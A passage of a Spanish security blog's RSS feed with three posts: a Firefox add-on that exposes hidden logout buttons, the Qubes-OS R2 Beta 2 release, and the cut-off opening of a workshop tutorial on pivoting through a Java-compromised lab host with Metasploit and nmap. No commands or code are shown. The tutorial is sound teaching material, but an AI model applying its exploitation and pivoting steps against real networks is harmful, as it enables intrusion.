Una de las muchas cosas que nos ha dejado la #rootedcon2013 ha sido este genial complemento para el navegador web Mozilla Firefox desarrollado por&amp;nbsp;&lt;a href="http://www.iniqua.com/" target="_blank"&gt;iniqua&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Para que sirve?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Este complemento nos ayudará a mostrar el botón de "logout" en aquellas aplicaciones WEB que lo tienen escondido, permitiendo al usuario cerrar adecuadamente su sesión y así evitar posible problemas con el "robo" de sesiones y/o de credenciales.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-eIxMezo-FE8/UTuVIWnCieI/AAAAAAAAEC8/uZw7OHkmbCY/s1600/linked-logout-popup.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="360" src="http://3.bp.blogspot.com/-eIxMezo-FE8/UTuVIWnCieI/AAAAAAAAEC8/uZw7OHkmbCY/s640/linked-logout-popup.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Show Logout Boton in about.me website.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Las páginas web soportadas hasta el momento son:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://facebook.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;facebook.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://twitter.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;twitter.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://tuenti.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;tuenti.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://mail.google.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;mail.google.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://mail.live.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;mail.live.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://linkedin.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;linkedin.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://about.me/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;about.me&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://spotify.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;spotify.com&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Y para la próxima versión de este complemento se esta trabajando en:&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://wordpress.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;wordpress.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://addons.mozilla.org/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;addons.mozilla.org&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://meneame.net/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;meneame.net&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://digg.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;digg.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://yahoo.com/" rel="nofollow" style="background-color: #fcfdfe; border: 0px; color: #447bc4; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px; text-align: start; text-decoration: none; vertical-align: baseline; word-wrap: break-word;"&gt;yahoo.com&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Descargar&lt;/span&gt;&lt;/b&gt;:&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://addons.mozilla.org/es/firefox/addon/popup-logout/"&gt;https://addons.mozilla.org/es/firefox/addon/popup-logout/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Vía twitter:&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a href="https://twitter.com/aramosf/status/310376781725179904" target="_blank"&gt;@aramosf&lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=CrwkYWFtfZ8:JHH3c7pfphc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=CrwkYWFtfZ8:JHH3c7pfphc:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=CrwkYWFtfZ8:JHH3c7pfphc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=CrwkYWFtfZ8:JHH3c7pfphc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=CrwkYWFtfZ8:JHH3c7pfphc:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=CrwkYWFtfZ8:JHH3c7pfphc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=CrwkYWFtfZ8:JHH3c7pfphc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=CrwkYWFtfZ8:JHH3c7pfphc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=CrwkYWFtfZ8:JHH3c7pfphc:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=CrwkYWFtfZ8:JHH3c7pfphc:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/CrwkYWFtfZ8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/CrwkYWFtfZ8/add-ons-para-firefox-que-muestra-el.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-x6yzIJT2D7M/UTuT7JVnbUI/AAAAAAAAEC0/pqR4sknrFzE/s72-c/PopUP-Logout.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/add-ons-para-firefox-que-muestra-el.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-8413219684557426487</guid><pubDate>Sat, 09 Mar 2013 19:46:00 +0000</pubDate><atom:updated>2013-03-09T20:49:34.722+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">VM</category><category domain="http://www.blogger.com/atom/ns#">KDE</category><category domain="http://www.blogger.com/atom/ns#">Qubes-OS</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Kernel</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><category domain="http://www.blogger.com/atom/ns#">Beta 2</category><category domain="http://www.blogger.com/atom/ns#">Computer Security</category><category domain="http://www.blogger.com/atom/ns#">AppVMs</category><title>[OS] Nueva versión de Qubes R2b2 | Windows Support and PDF converter</title><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-I3qhXGNYemo/UTuSQBWmdjI/AAAAAAAAECs/FyERiC4m4vk/s1600/Qubes-OS.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-I3qhXGNYemo/UTuSQBWmdjI/AAAAAAAAECs/FyERiC4m4vk/s1600/Qubes-OS.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Introducción&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace un tiempo &lt;a href="http://www.seguridadparatodos.es/2012/01/qubes-os-next-os-generation.html" target="_blank"&gt;escribí un artículo&lt;/a&gt; donde os presentaba el proyecto Qubes-OS, un sistema operativo seguro, donde cada&amp;nbsp;&lt;u&gt;aplicación/sistema se ejecuta en un entorno virtualizado totalmente independiente&lt;/u&gt; del resto del sistema, es lo que los propios desarrolladores&amp;nbsp;bautizaron&amp;nbsp;con las siglas NOSG (Next OS Generation), o lo que es lo mismo, la próxima generación de Sistemas Operativos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-bS8ogURE0zk/UTuKyI14D_I/AAAAAAAAECc/UFwXz3DO9Aw/s1600/Qubes-r2b2-kde-three-domains-at-work.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="360" src="http://1.bp.blogspot.com/-bS8ogURE0zk/UTuKyI14D_I/AAAAAAAAECc/UFwXz3DO9Aw/s640/Qubes-r2b2-kde-three-domains-at-work.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;[Qubes-OS] Tres dominios independientes entre si&amp;nbsp;ejecutándose&amp;nbsp;al mismo tiempo.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Desde el lanzamiento de la &lt;a href="http://wiki.qubes-os.org/trac/wiki/QubesDownloads" target="_blank"&gt;segunda versión del mismo&lt;/a&gt;, la novedad más interesante fue la posibilidad de ejecutar máquinas virtuales Windows, por lo que ya no hay &lt;b&gt;excusas para no darle una oportunidad&lt;/b&gt; a este&amp;nbsp;fantástico&amp;nbsp;sistema.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-gKi_FKkj6UA/UTuJ8Y_yHlI/AAAAAAAAECU/j69eUi1bTgw/s1600/Qubes-r2b2-windows-hvm-power-point.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="360" src="http://3.bp.blogspot.com/-gKi_FKkj6UA/UTuJ8Y_yHlI/AAAAAAAAECU/j69eUi1bTgw/s640/Qubes-r2b2-windows-hvm-power-point.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;[Qubes-OS R2b2] Running Windows 7 in a Virtual Secure Domain.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Con &lt;a href="http://qubes-os.org/trac" target="_blank"&gt;Qubes-OS&lt;/a&gt; puedes crear diferentes escritorios, o más bien &lt;b&gt;dominios&lt;/b&gt;, cada dominio esta totalmente aislado de los otros, incluso a nivel de red, esto ultimo siempre que se cumplan algunos de los requisitos en el hardware,como por ejemplo, disponer de la tecnología de virtualización Intel-VT-d o&amp;nbsp;AMD IOMMU&amp;nbsp;(ejemplos: Cores i5, i7).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Novedades: Qubes-OS R2b2&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Las principales novedades de la versión R2 Beta 2 que hace una semana fue lanzada, es la incorporación de:&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Nueva compatibilidad para los&amp;nbsp;últimos&amp;nbsp;hardware gráficos (GPU drivers).&lt;/li&gt;
&lt;li&gt;Se ha incluido la capacidad de elegir la interfaz gráfica KDE4 (4.9) o Xcfe 4.10.&lt;/li&gt;
&lt;li&gt;Nuevas funcionalidad como por ejemplo, convertir potenciales PDF peligrosos en PDF seguros.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
La nueva funcionalidad es muy interesante, voy a poner un &lt;u&gt;ejemplo&lt;/u&gt; para introducir y explicar la nueva capacidad.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Imaginemos que estamos utilizando un "dominio Internet", normalmente este dominio, será peligroso, es decir, tenemos el dominio de Internet activado con Firefox o Chrome, y lo usamos para poder navegar libremente por Internet sin preocuparnos las páginas que visitamos, porque si llegase a comprometerse con una vulnerabilidad (ej: JAVA), esta quedaría aislada a ese entorno (dominio / sandbox) y cuando finalizaramos la sesión, desaparecería cualquier #malware que hubiera podido ejecutarse.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Pero digamos, que &lt;i&gt;durante nuestra navegación por Internet&lt;/i&gt;, descargamos varios PDFs que necesitamos para nuestro trabajo, ¿cómo sabemos que esta seguros? o mejor aún, ¿s&lt;b&gt;ería posible pasar dichos documentos a un entorno seguro de trabajo sin correr riesgo alguno&lt;/b&gt;? La respuesta es &lt;b&gt;SI&lt;/b&gt;, en esta versión se ha incluido la capacidad de convertir PDF no "confiables" a PDF seguros.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;[Qubes-OS PDF Converter] | MECANISMO&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El mecanismo es extremadamente sencillo, cuando se abre un fichero del tipo PDF, DOC, etc este se procesará dentro de un entorno VM independiente, es decir, se ejecutará dentro de un entorno seguro y controlado, similar a un sandbox, el tiempo aproximado de espera es de 5 segundos. Una penalización muy pequeña comparado con el peligro de convertir nuestro equipo en un "zombie" miembro de una botnet, o exponer nuestros datos a cualquier "atacante". &lt;b&gt;¿No&amp;nbsp;creéis&amp;nbsp;que 5 segundo de retardo en la apertura del documento bien lo merecen, si estamos seguros?&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-REGP0AjGYaY/UTuOD7262jI/AAAAAAAAECo/k2bK-QdJBK0/s1600/Qubes-os-pdf-conversion.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://2.bp.blogspot.com/-REGP0AjGYaY/UTuOD7262jI/AAAAAAAAECo/k2bK-QdJBK0/s640/Qubes-os-pdf-conversion.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;[Qubes-OS] Convertir PDF "inseguros/peligrosos" a PDF seguros&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Download&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul style="font-family: Verdana, Arial, 'Bitstream Vera Sans', Helvetica, sans-serif; font-size: 13px;"&gt;
&lt;li&gt;&lt;a class="ext-link" href="http://sourceforge.net/projects/qubesos/files/Qubes-R2-Beta2-x86_64-DVD.iso/download" style="border-bottom-color: rgb(187, 187, 187); border-bottom-style: dotted; border-bottom-width: 1px; color: #bb0000; text-decoration: none;"&gt;&lt;span class="icon" style="background-image: url(http://wiki.qubes-os.org/trac/chrome/common/extlink.gif); background-position: 0% 50%; background-repeat: no-repeat no-repeat; padding-left: 15px;"&gt;​&lt;/span&gt;Qubes-R2-Beta2-x86_64-DVD.iso&lt;/a&gt;&amp;nbsp;(via sourceforge.net)&lt;/li&gt;
&lt;li&gt;&lt;a class="ext-link" href="http://sourceforge.net/projects/qubesos/files/Qubes-R2-Beta2-x86_64-DVD.iso.asc/download" style="border-bottom-color: rgb(187, 187, 187); border-bottom-style: dotted; border-bottom-width: 1px; color: #bb0000; text-decoration: none;"&gt;&lt;span class="icon" style="background-image: url(http://wiki.qubes-os.org/trac/chrome/common/extlink.gif); background-position: 0% 50%; background-repeat: no-repeat no-repeat; padding-left: 15px;"&gt;​&lt;/span&gt;Digital Signature&lt;/a&gt;&amp;nbsp;(via sourceforge.net)&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style="background-color: white; font-family: Verdana, Arial, 'Bitstream Vera Sans', Helvetica, sans-serif; font-size: 13px;"&gt;
&lt;li&gt;&lt;strong&gt;&lt;a class="wiki" href="http://wiki.qubes-os.org/trac/wiki/InstallationGuideR2B2" style="border-bottom-color: rgb(187, 187, 187); border-bottom-style: dotted; border-bottom-width: 1px; color: #bb0000; text-decoration: none;"&gt;Installation Guide for R2 Beta 2&lt;/a&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="wiki" href="http://wiki.qubes-os.org/trac/wiki/UpgradeToR2B2" style="border-bottom-color: rgb(187, 187, 187); border-bottom-style: dotted; border-bottom-width: 1px; color: #bb0000; text-decoration: none;"&gt;Upgrading to Qubes R2 Beta 2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Más Información&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a href="http://qubes-os.org/trac" target="_blank"&gt;Qubes-OS Website&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://theinvisiblethings.blogspot.com.es/2013/02/qubes-2-beta-2-has-been-released.html" target="_blank"&gt;The Invisible Things Lab's blog&amp;nbsp;|&amp;nbsp;Qubes 2 Beta 2 has been released!&lt;/a&gt;&lt;br /&gt;
&lt;div&gt;
&lt;a href="http://theinvisiblethings.blogspot.com.es/2013/02/converting-untrusted-pdfs-into-trusted.html" target="_blank"&gt;Converting untrusted PDFs into trusted ones: The Qubes Way&lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=IAU5YLGSkNs:xBubqgPKklU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=IAU5YLGSkNs:xBubqgPKklU:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=IAU5YLGSkNs:xBubqgPKklU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=IAU5YLGSkNs:xBubqgPKklU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=IAU5YLGSkNs:xBubqgPKklU:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=IAU5YLGSkNs:xBubqgPKklU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=IAU5YLGSkNs:xBubqgPKklU:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=IAU5YLGSkNs:xBubqgPKklU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=IAU5YLGSkNs:xBubqgPKklU:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=IAU5YLGSkNs:xBubqgPKklU:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/IAU5YLGSkNs" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/IAU5YLGSkNs/Qubes-OS-R2b2.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-I3qhXGNYemo/UTuSQBWmdjI/AAAAAAAAECs/FyERiC4m4vk/s72-c/Qubes-OS.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/Qubes-OS-R2b2.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-3354977242897428271</guid><pubDate>Wed, 06 Mar 2013 08:30:00 +0000</pubDate><atom:updated>2013-03-18T16:26:27.623+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Taller</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Pivoting</category><category domain="http://www.blogger.com/atom/ns#">Java</category><category domain="http://www.blogger.com/atom/ns#">parte2</category><category domain="http://www.blogger.com/atom/ns#">UCO</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidad</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><category domain="http://www.blogger.com/atom/ns#">Seclabs</category><title>[Pivoting] Exploración de una Red remota utilizando un pivote con #Metasploit (II)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;b style="text-align: justify;"&gt;&lt;span style="font-size: large;"&gt;RECORDAMOS&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
En el &lt;a href="http://www.seguridadparatodos.es/2013/03/pivoting-exploracion-de-una-red-remota.html" target="_blank"&gt;artículo de ayer&lt;/a&gt;, se utilizo #Metasploit para explotar una vulnerabilidad de JAVA a través del navegador WEB, con este tipo de ataque se pudo comprometer un equipo de la red privada (192.168.3.0/24) del escenario propuesto para la demostración.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
Además, una vez que se&amp;nbsp;había&amp;nbsp;comprometido al usuario A (USR-A) &amp;nbsp;se configuro #Metasploit para utilizar al usuario A como "pivote", y de esa forma poder &lt;b&gt;explorar la red interna de la empresa como si el ATACANTE se encontrará directamente conectado en la red privada 192.168.3.0/24&lt;/b&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;a href="http://3.bp.blogspot.com/-7HEe431z2Wo/UTYynTK6GlI/AAAAAAAAD-8/pzPjE6ipkkE/s1600/Taller_Hacking_Etico_UCO_p2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-7HEe431z2Wo/UTYynTK6GlI/AAAAAAAAD-8/pzPjE6ipkkE/s1600/Taller_Hacking_Etico_UCO_p2.jpg" /&gt;&lt;/a&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;CONTINUACIÓN&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La información de la que se dispone, tras las primeras averiguaciones dentro de la red privada (PRIVATE) donde se encuentra ubicado nuestro equipo comprometido, es que existe un equipo en otra red 192.168.2.0/24, concretamente se trata de la IP:192.168.2.3 y que tiene establecida una conexión con el equipo 192.168.3.3 por el puerto 445, habitualmente utilizado para compartir archivos en la red.&lt;br /&gt;
&lt;br /&gt;
Para cerciorarnos, se va a utilizar nmap para escanear el equipo objetivo&amp;nbsp;&lt;b&gt;a través de nuestro pivote&amp;nbsp;&lt;/b&gt;(USR_A), esto&amp;nbsp;&lt;b&gt;nos permitirá iniciar la exploración de la red interna como si el&amp;nbsp;mismísimo&amp;nbsp;equipo USR_A fuera quien ejecutará dichas acciones, &lt;/b&gt;es decir, la dirección IP detectada por el equipo 192.168.2.3 como origen de las conexiones (ataques) será la misma que la del usuario A (USR-A).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
